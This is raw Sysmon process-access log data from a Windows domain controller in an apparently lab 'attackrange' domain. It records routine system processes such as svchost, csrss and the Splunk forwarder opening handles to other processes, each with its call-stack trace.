15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.799{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.799{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.768{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7D91-5FA1-7601-000000008801}3100C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+21062|c:\windows\system32\usocore.dll+158b4|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.674{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7D91-5FA1-7601-000000008801}3100C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7D91-5FA1-7701-000000008801}39484136C:\Windows\system32\conhost.exe{D28789B6-7D91-5FA1-7601-000000008801}3100C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7D91-5FA1-7701-000000008801}3948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7D91-5FA1-7601-000000008801}3100C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7D91-5FA1-7601-000000008801}3100C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.659{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.989{D28789B6-7D9B-5FA1-7901-000000008801}33564808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9B-5FA1-7901-000000008801}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 